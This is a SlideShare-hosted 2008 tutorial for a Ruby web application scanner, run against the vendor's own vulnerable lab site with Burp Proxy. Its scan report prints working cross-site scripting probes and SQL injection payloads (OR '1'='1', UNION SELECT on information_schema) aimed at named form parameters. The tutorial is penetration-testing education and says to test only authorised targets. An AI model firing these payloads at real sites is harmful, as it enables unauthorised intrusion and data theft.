SlideShare ist ein Scribd-Unternehmen logo

sts-scanner_tutorial

T
tutorialsruby
Technologie
1 von 13
Downloaden Sie, um offline zu lesen
STS Scanner Tutorial By Jordan Del-Grande Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 1 of 13
Table of Contents STS Scanner Tutorial.....................................................................................................1 Preamble...................................................................................................................3 Introduction..............................................................................................................3 Installation................................................................................................................3 The Assessment........................................................................................................4 Reconnaissance ....................................................................................................4 Enumeration..........................................................................................................7 Testing..................................................................................................................7 Reviewing the Results...........................................................................................8 Future Improvements................................................................................................9 Appendix A: STS-Scanner Report...............................................................................10 Company Details..........................................................................................................13 About the Author....................................................................................................13 Contact Information................................................................................................13 Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 2 of 13
Preamble This paper is an how-to on the correct usage of the STS Scanner. The tool is freely available for download at http://www.securitytechscience.com/resources/. The information is made available to educate testers on how to discover these vulnerabilities and developers on how to prevent writing applications that contain these types of vulnerabilities. All techniques in this paper were performed within the confines of the Security Technology Science Testing Lab. Only test on applications that are either under your direct ownership or you have written legal authorisation to test. Introduction The STS Scanner is specifically a web application scanner. It is not designed to replace the penetration tester or the penetration test. It is a tool that should assist the penetration tester in performing a vulnerability assessment/penetration test and hence is only one step of many in the process. With that said, the paper is organised in much the same fashion as the high level steps in a penetration test. It should not be mistaken that this is the be all and end all of the penetration test. The other sections of a penetration test have been excluded in order to focus primarily on how to use the STS Scanner. For a comprehensive guide on performing a penetration test see OWASP http://www.owasp.org/index.php/Category:OWASP_Testing_Project. Installation Step 1: Install Ruby The STS Scanner has been completely written using the Ruby programming language. Information on how to download and install Ruby can be found at http://www.ruby- lang.org/en/downloads/. Step 2: Install RubyGems Note: For those using windows, you can skip this step if you used the Ruby One Click Installer. There is one RubyGems library which is needed and as such RubyGems is necessary. Information on how to download and install RubyGems can be found here http://rubygems.org/. Step 3: Install Hpricot Hpricot is a RubyGems library used for parsing html pages. Run the following from the command line as a privileged user... gem install hpricot ­­remote   Step 4: Run STS Scanner To test that the installation was a success, run the STS Scanner from the command line. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 3 of 13
Step 5: Check out the STS Scanner Options Run ruby sts-scanner.rb –help The Assessment Now that some background contextual information has been provided and you have installed the necessary components, let's begin by performing a web application scan on the Security Technology Science vulnerable web application, “OnlineBusiness”. There will in fact be 3 separate scans run in order to ensure that the majority of the applications attack surface area is completely discovered. The scans can be categorised as follows... 1. Reconnaissance Scan (Blind Scan) – Spider the site then scan 2. Unauthenticated Scan – Manually crawl the site then scan 3. Authenticated Scan – Manually crawl the site as an authenticated user then scan Reconnaissance As this is a black box assessment the only information provided to us is the URL of the application to be tested: http://onlinebusiness.com.au/. Browsing to the site we see the following page Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 4 of 13
Figure 1.0 – OnlineBusiness Home Page At present we have gathered enough information to perform a reconnaissance/blind scan. We have the URL and we can see that the application runs over http on port 80. We can kick off the sts-scanner to firstly spider the application and then perform the appropriate tests by running the following command.... ruby sts­scanner.rb http://onlinebusiness.com.au Starting the Web Crawler... . . Web Crawler Complete! Starting Application Scan => http://onlinebusiness.com.au h .. ALERT: Directory Listing Detected => GET /images/ ..... ALERT: Cross­Site Scripting Vulnerability Detected in Repsonse Body  => GET /contacts.php ..................... Application Scan Complete!  Compiling results...Done! Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 5 of 13
We will continue on with the reconnaissance to ensure that the majority of the applications attack surface area is completely recognised. After all, there are certain pages that the spider cannot yet recognise, such as certain JavaScript and Ajax code. As such, we will launch Burp Suite and begin manually crawling the application logging all requests to a local file. Firstly, configure your browser to proxy all request locally over port 8080. Figure 1.1 – Set up proxy Next, configure Burp Proxy to log all requests to a local file ‘onlinebusiness.burp’. Figure 1.2 – Logging all requests locally Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 6 of 13
Finally, test that a request is passed through the Burp Proxy and begin the crawl of the entire application. Figure 1.3 – Burp Proxy Request Enumeration After crawling the website, we notice there is a ‘Login’ page, so we can assume there is a section of this application that requires authentication and the appropriate levels of authorisation to be viewed. Leveraging the “Application Username Enumeration” Whitepaper techniques found here http://www.securitytechscience.com/resources/, we discover a user name of ‘10006’ and password of ‘password’ with the application using cookies to track user sessions. We now use these credentials to log into the application, we create a new Burp Log file called ‘onlinebusiness-authenticated.burp’ and perform the crawl again. Note: We are careful not to click on any logout or change password links. Testing We can now begin the unauthorised scan of the application. It’s a simple matter of providing the sts-scanner with the burp file location... ruby sts­scanner.rb ­­log onlinebusiness.burp http://onlinebusiness.com.au  Next we need to perform the authorised scan of the application. As we now know the application uses cookies to track user sessions, we need to use Burp Proxy in order to view the session cookie. Log into the application and then make sure the ‘intercept is on’ button is enabled within Burp Proxy. Click on any link or perform a refresh of the current page and look for the session cookie. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 7 of 13
Figure 1.4 – Session Cookie Using the session cookie identified and still remaining logged into the application, we can now perform the authorised scan... ruby sts­scanner.rb ­­log onlinebusiness­authenticated.burp ­­cookie     “sessionid=123456” http://onlinebusiness.com.au Reviewing the Results After every scan is complete, the sts-scanner produces several different files. They are... 1. spider.log – log of all the spiders requests and responses 2. scanner.log – log of all the scanners requests and responses 3. date-time-host.txt – text file of the attack surface area and the vulnerabilities discovered Note: For the sake of brevity we are only going to focus on the last file. The complete file is located in Appendix A. Section 1: Target This section contains the target host the scanner tested. That is, http://onlinebusiness.com.au ** STS Web Application Scanner ** Target => http://onlinebusiness.com.au Section 2: Crawl This section contains the surface area the spider was able to identify. ** Crawling Target Site ** GET / GET /images/glasses.jpg Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 8 of 13
GET /images/english.gif GET /contacts.php POST /contacts.php?postcode= ... Section 3: Vulnerabilities This section contains the identified vulnerabilities from the scan. Going from top to bottom there is a directory listing identified, two cross site scripting holes and one definite sql injection where the scanner identified the DBMS as MySQL and that there are 5 varchars columns in the table. ** Starting Application Scan ** ALERT: Directory Listing Detected => GET /images/ ALERT: Cross­Site Scripting Vulnerability Detected in Response Body =>  GET /contacts.php user­agent: "><script>alert('Vulnerable');</script> ALERT: Cross­Site Scripting Vulnerability Detected in Response Body =>  POST /contacts.php?postcode="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /contacts.php? postcode=te'st ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR %20'1'%3D'1'­­ ALERT: Enumerated column number blind: 5 => POST /contacts.php? postcode=1%20ORDER%20BY%206­­ ALERT: Verified database type blind: mysql => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM %20information_schema.TABLES­­ ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION %20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES­­ ... Future Improvements The STS Scanner uses Mechanize and Hpricot to parse and spider html pages. These libraries are not able to parse and idenitify JavaScript and/or Ajax code. A separate version of the STS Scanner is to be developed where the internal core does not rely on these libraries and they shall become obsolete. The core shall act more like an everyday browser (i.e., IE, Firefox, etc) so it can hopefully branch out into other applications such as Flash and web services. The testing modules are currently limited to performing only 3 types of tests (i.e., sql injection, xss injection, directory indexing). These are to be expanded to incorporate mores injection tests such as CSRF, code execution, HTTP response splitting, etc. The reporting functionality is to be updated to produce pdf files containing clickable links, statistics and graphs. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 9 of 13
Appendix A: STS-Scanner Report ** STS Web Application Scanner ** Target => http://onlinebusiness.com.au ** Crawling Target Site ** GET / GET /images/glasses.jpg GET /images/english.gif GET /images/french.gif GET /images/russian.gif GET /contacts.php POST /contacts.php?postcode= GET /database/contacts.txt GET /login.php POST /login.php?login=&password= GET /login.php?msg='Username%20does%20not%20exist' POST /login.php?login=&password= GET /logininformation.php GET /products.php POST /products.php?name=&description=&type=Stock GET /index.php ** Crawling Complete ** ** Starting Application Scan ** ALERT: Directory Listing Detected => GET /images/ ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php user-agent: "><script>alert('Vulnerable');</script> ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /contacts.php? postcode=te'st ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR %20'1'%3D'1'-- ALERT: Enumerated column number blind: 5 => POST /contacts.php? postcode=1%20ORDER%20BY%206-- Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 10 of 13
ALERT: Verified database type blind: mysql => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM %20information_schema.TABLES-- ALERT: Enumerated data types blind => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM %20information_schema.TABLES-- ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode= user-agent: "><script>alert('Vulnerable');</script> ALERT: Directory Listing Detected => GET /database/ ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /login.php?msg="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /products.php? name=te'st&description=&type=Stock ALERT: Possible SQL Injection Exploit => POST /products.php?name=1'%20OR %20'1'%3D'1&description=&type=Stock ALERT: Verified Database Type: mysql => POST /products.php? name=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where %20'1'%3D'1&description=&type=Stock ALERT: Column Enumeration Successful: 3 => POST /products.php? name=1'%20UNION%20ALL%20select%20null,null,null%20from %20information_schema.TABLES%20where %20'1'%3D'1&description=&type=Stock ALERT: Enumerated data types => POST /products.php?name=1'%20UNION %20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES %20where%20'1'%3D'1&description=&type=Stock ALERT: MySQL Database Error Message Detected => POST /products.php? name=&description=te'st&type=Stock ALERT: Possible SQL Injection Exploit => POST /products.php? name=&description=1'%20OR%20'1'%3D'1&type=Stock ALERT: Verified Database Type: mysql => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH %20where%20'1'%3D'1&type=Stock ALERT: Column Enumeration Successful: 3 => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20null,null,null%20from %20information_schema.TABLES%20where%20'1'%3D'1&type=Stock Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 11 of 13
ALERT: Enumerated data types => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20'b','b','b'%20from %20information_schema.TABLES%20where%20'1'%3D'1&type=Stock ** Scan Finished ** ** Attack Surfaces ** == Parameter Attack Surface == = HTTP Client Header = cookie referer user-agent = GET/POST Parameter = GET /login.php+msg POST /contacts.php+postcode POST /login.php+login+password POST /products.php+name+description+type == Directory Attack Surface == GET / GET /database/ GET /images/ == File Attack Surface == GET /contacts.php GET /database/contacts.txt GET /index.php GET /login.php GET /logininformation.php GET /products.php ** End of Attack Surface ** Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 12 of 13
Company Details About the Author Jordan Del-Grande, Director and Principal Consultant at Security Technology Science, has several years of successful management and consulting experience performing Information Security and Risk Management services in predominantly financial organisations. Prior to Security Technology Science, he spent several years as a consultant with Ernst & Young and the Advanced Security Center. Contact Information Company Name: Security Technology Science Pty Ltd Email: info@securitytechscience.com Web Site: www.securitytechscience.com Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 13 of 13

Empfohlen

Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 

Empfohlen

Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecuritySiarhei Barysiuk
 
How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )Katy Slemon
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
nullcon 2011 - Exploiting SCADA Systems
nullcon 2011 - Exploiting SCADA Systemsnullcon 2011 - Exploiting SCADA Systems
nullcon 2011 - Exploiting SCADA Systemsn|u - The Open Security Community
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Web Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug BountiesWeb Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug Bountieskunwaratul hax0r
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5Jayesh Patel
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9Nutan Kumar Panda
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 
Web application security
Web application securityWeb application security
Web application securityVikas Thange
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerSteve Poole
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目yiditushe
 
cs3157-summer06-lab1
cs3157-summer06-lab1cs3157-summer06-lab1
cs3157-summer06-lab1tutorialsruby
 
Using Internet Technology for Learning
Using Internet Technology for LearningUsing Internet Technology for Learning
Using Internet Technology for LearningCommunity Legal Education Ontario (CLEO)
 

Weitere ähnliche Inhalte

Was ist angesagt?

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )Katy Slemon
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Web Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug BountiesWeb Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug Bountieskunwaratul hax0r
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 
Web application security
Web application securityWeb application security
Web application securityVikas Thange
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerSteve Poole
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 

Was ist angesagt? (19)

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Security Function
Security FunctionSecurity Function
Security Function
 
nullcon 2011 - Exploiting SCADA Systems
nullcon 2011 - Exploiting SCADA Systemsnullcon 2011 - Exploiting SCADA Systems
nullcon 2011 - Exploiting SCADA Systems
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Web Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug BountiesWeb Application Security And Getting Into Bug Bounties
Web Application Security And Getting Into Bug Bounties
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 
Web application security
Web application securityWeb application security
Web application security
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 

Andere mochten auch

给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目yiditushe
 
cs3157-summer06-lab1
cs3157-summer06-lab1cs3157-summer06-lab1
cs3157-summer06-lab1tutorialsruby
 
CERT - EXXONMOBIL - CYBER SECURITY AWARNESS
CERT - EXXONMOBIL - CYBER SECURITY AWARNESSCERT - EXXONMOBIL - CYBER SECURITY AWARNESS
CERT - EXXONMOBIL - CYBER SECURITY AWARNESSMaria Raju
 
Viral Marketing v praxi by ZARAGUZA .Com
Viral Marketing v praxi by ZARAGUZA .ComViral Marketing v praxi by ZARAGUZA .Com
Viral Marketing v praxi by ZARAGUZA .ComZARAGUZA DIGITAL
 
O papel da tutoria no desenvolvimento curricular
O papel da tutoria no desenvolvimento curricularO papel da tutoria no desenvolvimento curricular
O papel da tutoria no desenvolvimento curricularMaria Casanova
 
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...drsolapurkar
 
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...drsolapurkar
 
Transformers Episode 16 Omega Supreme
Transformers Episode 16 Omega SupremeTransformers Episode 16 Omega Supreme
Transformers Episode 16 Omega SupremeRyan Sadler
 
线程编程方面
线程编程方面线程编程方面
线程编程方面yiditushe
 
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PA
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PACERT - GULF TRAINER - EXECUTIVE SECRETARY & PA
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PAMaria Raju
 
&lt;b>PHP 5&lt;/b> Classes and Objects
&lt;b>PHP 5&lt;/b> Classes and Objects&lt;b>PHP 5&lt;/b> Classes and Objects
&lt;b>PHP 5&lt;/b> Classes and Objectstutorialsruby
 

Andere mochten auch (19)

给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目给学习J2 Ee的朋友一些值得研究的开源项目
给学习J2 Ee的朋友一些值得研究的开源项目
 
cs3157-summer06-lab1
cs3157-summer06-lab1cs3157-summer06-lab1
cs3157-summer06-lab1
 
Using Internet Technology for Learning
Using Internet Technology for LearningUsing Internet Technology for Learning
Using Internet Technology for Learning
 
CERT - EXXONMOBIL - CYBER SECURITY AWARNESS
CERT - EXXONMOBIL - CYBER SECURITY AWARNESSCERT - EXXONMOBIL - CYBER SECURITY AWARNESS
CERT - EXXONMOBIL - CYBER SECURITY AWARNESS
 
Viral Marketing v praxi by ZARAGUZA .Com
Viral Marketing v praxi by ZARAGUZA .ComViral Marketing v praxi by ZARAGUZA .Com
Viral Marketing v praxi by ZARAGUZA .Com
 
CL2009_ANNIS_pre
CL2009_ANNIS_preCL2009_ANNIS_pre
CL2009_ANNIS_pre
 
O papel da tutoria no desenvolvimento curricular
O papel da tutoria no desenvolvimento curricularO papel da tutoria no desenvolvimento curricular
O papel da tutoria no desenvolvimento curricular
 
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...
L E A R N I N G I S B L O S S O M I N G D R S H R I N I W A S K A S H A ...
 
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...
A A R O G Y A D E E P M A R A T H I B E S T S E L L E R O N M E D I C A L...
 
Mariam cv
Mariam cvMariam cv
Mariam cv
 
Transformers Episode 16 Omega Supreme
Transformers Episode 16 Omega SupremeTransformers Episode 16 Omega Supreme
Transformers Episode 16 Omega Supreme
 
线程编程方面
线程编程方面线程编程方面
线程编程方面
 
Dead bodies scene
Dead bodies sceneDead bodies scene
Dead bodies scene
 
Media Productions
Media ProductionsMedia Productions
Media Productions
 
ACCA Membership certificate
ACCA Membership certificateACCA Membership certificate
ACCA Membership certificate
 
LatexTutorial
LatexTutorialLatexTutorial
LatexTutorial
 
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PA
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PACERT - GULF TRAINER - EXECUTIVE SECRETARY & PA
CERT - GULF TRAINER - EXECUTIVE SECRETARY & PA
 
&lt;b>PHP 5&lt;/b> Classes and Objects
&lt;b>PHP 5&lt;/b> Classes and Objects&lt;b>PHP 5&lt;/b> Classes and Objects
&lt;b>PHP 5&lt;/b> Classes and Objects
 
cisco_cv
cisco_cvcisco_cv
cisco_cv
 

Ähnlich wie sts-scanner_tutorial

Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guideSudhanshu Chauhan
 
HP WebInspect
HP WebInspectHP WebInspect
HP WebInspectrohit_ta
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerThreatReel Podcast
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
website vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperwebsite vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperBhagyashri Chalakh
 
POC-Netsparker
POC-NetsparkerPOC-Netsparker
POC-NetsparkerRaj Sawant
 
SPI Dynamics web application security 101
SPI Dynamics web application security 101 SPI Dynamics web application security 101
SPI Dynamics web application security 101 Wade Malone
 
15minutesintroductiontoappdynamics1.pdf
15minutesintroductiontoappdynamics1.pdf15minutesintroductiontoappdynamics1.pdf
15minutesintroductiontoappdynamics1.pdfAnuSelvaraj2
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Advanced security - Seccom Global
Advanced security - Seccom Global Advanced security - Seccom Global
Advanced security - Seccom Global Kim Tu
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Web application finger printing - whitepaper
Web application finger printing - whitepaperWeb application finger printing - whitepaper
Web application finger printing - whitepaperAnant Shrivastava
 
AppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileAppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileOleg Gryb
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuceDb Cooper
 
Web Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and PreventionWeb Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and Preventionn|u - The Open Security Community
 
Securing web applications
Securing web applicationsSecuring web applications
Securing web applicationsSupreme O
 
2016 Guide to User Data Security
2016 Guide to User Data Security2016 Guide to User Data Security
2016 Guide to User Data SecuritySean Bryant
 

Ähnlich wie sts-scanner_tutorial (20)

Web application penetration testing lab setup guide
